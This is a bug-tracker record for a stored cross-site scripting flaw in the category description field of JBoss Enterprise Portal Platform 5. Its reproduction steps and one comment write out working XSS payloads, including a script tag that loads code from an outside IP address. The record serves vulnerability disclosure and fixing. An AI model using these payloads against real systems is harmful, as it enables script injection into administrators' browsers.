Bug 793926 (JBEPP-997)

Summary: XSS issue in category description
Product: [JBoss] JBoss Enterprise Portal Platform 5 Reporter: Thomas Heute <theute>
Component: unspecifiedAssignee: Thomas Heute <theute>
Status: CLOSED NEXTRELEASE QA Contact:
Severity: high Docs Contact:
Priority: high    
Version: 5.1.1.GACC: bmachado, epp-bugs, smumford, theute
Target Milestone: ---   
Target Release: 5.1.1.DEV03, 5.2.0.DEV02   
Hardware: Unspecified   
OS: Unspecified   
URL: http://jira.jboss.org/jira/browse/JBEPP-997
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2011-08-11 09:02:29 UTC Type: Bug
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:

Description Thomas Heute 2011-07-08 08:35:00 UTC 
Help Desk Ticket Reference: https://c.na7.visual.force.com/apex/Case_View?id=500A0000007CtcY&sfdc.override=1
project_key: JBEPP

Our application security center of excellence discovered a cross-site scripting vulnerability with the application registry portlet.  Here are the steps to reproduce:

Steps to Reproduce Exploit:
1. Log in to the application as &quot;Administrators&quot; user role.
2. Click on &quot;Edit Category&quot; button.
3. Type at the &quot;Description&quot; field the following: Dashboard&lt;/textarea&gt;&lt;script
src=\\3.211.64.16\xsrf\a.js></script&gt;.
4. Press on &quot;Save&quot; button.
5. Then click on &quot;Edit Category&quot; button.
6. Finally, the script is executed as proof of the vulnerability
Comment 1 Thomas Heute 2011-07-08 08:51:08 UTC 
Link: Added: This issue is related to GTNPORTAL-1955
Comment 2 Thomas Heute 2011-07-08 09:46:34 UTC 
Help Desk Ticket Reference: Added: https://c.na7.visual.force.com/apex/Case_View?id=500A0000007CtcY&sfdc.override=1
Comment 3 Bruno Machado 2011-07-08 14:59:14 UTC 
Pretty much the same steps in the description of this Jira. I could also reproduce using <script>alert("some string") as showed in step 4.

1. login as root
2. Group -> Administration -> Application Registry
3. Edit Category
4. Type at the "Description" field the following:

Dashboard</textarea><script src=\\3.211.64.16\xsrf\a.js>

or

Dashboard</textarea><script>alert("Bad XSS");</script>

5. Click on Save button.
6. Then click on "Edit Category" button.
7. Finally, the script is executed as proof of the vulnerability
Comment 4 Thomas Heute 2011-07-10 19:23:02 UTC 
I don't understand, are you saying that the patch doesn't work ?
Comment 5 Scott Mumford 2011-07-11 01:36:34 UTC 
Release Notes Docs Status: Added: Not Required
Release Notes Text: Added: Included in the Release Note for JBEPP-598
Comment 6 Bruno Machado 2011-07-11 21:12:02 UTC 
I hadn't seen that the case status was Resolved while I was righting my comment, you can probably ignore it. I haven't test with 5.1.1.DEV03 yet, I was just saying that error was happening with the strings "Dashboard</textarea><script src=" and "Dashboard</textarea><script>".

Thanks.
Comment 7 hfnukal@redhat.com 2011-08-02 05:46:47 UTC 
Link: Added: This issue is related to JBEPP-1023
Comment 8 hfnukal@redhat.com 2011-08-02 05:47:45 UTC 
Link: Added: This issue is related to JBEPP-365
Comment 9 Michal Vanco 2011-08-10 11:54:21 UTC 
Re-opening the issue, still present in 5.1.1 GA.
Comment 10 Michal Vanco 2011-08-17 14:58:34 UTC 
Link: Added: This issue relates to JBEPP-1079
Comment 11 hfnukal@redhat.com 2011-08-31 15:40:34 UTC 
Link: Added: This issue is related to GTNPORTAL-2073
Comment 12 hfnukal@redhat.com 2011-09-07 16:19:03 UTC 
Security: Removed: RHT+eXo Added: Public